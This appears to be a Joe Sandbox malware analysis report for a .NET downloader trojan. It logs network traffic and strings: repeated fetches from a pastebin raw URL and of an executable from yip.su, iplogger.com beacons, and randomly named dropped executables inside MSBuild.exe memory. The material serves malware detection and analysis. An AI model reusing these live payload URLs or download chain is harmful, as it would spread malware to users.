Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: iplogger.com

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: yip.su
Source: global traffic	DNS traffic detected: DNS query: iplogger.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:20:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:21:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:22:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Sep 2024 19:23:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge

Source: MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/we1/bCj6TXPeWec.crl0
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: svchost.exe, 00000009.00000002.3816448684.000002CA7A800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MSBuild.exe, 00000007.00000002.4622387096.000000000109D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: MSBuild.exe, 00000007.00000002.4625191129.0000000005EF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/we1.crt0
Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001037000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/s/we1/mus0%
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yip.su
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://cdn.iplogger.org/favicon.ico
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://counter.yadro.ru/hit?
Source: qmgr.db.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000009.00000003.2174242561.000002CA7A660000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.com/1djqU4
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://iplogger.org/
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://iplogger.org/privacy/
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://iplogger.org/rules/
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
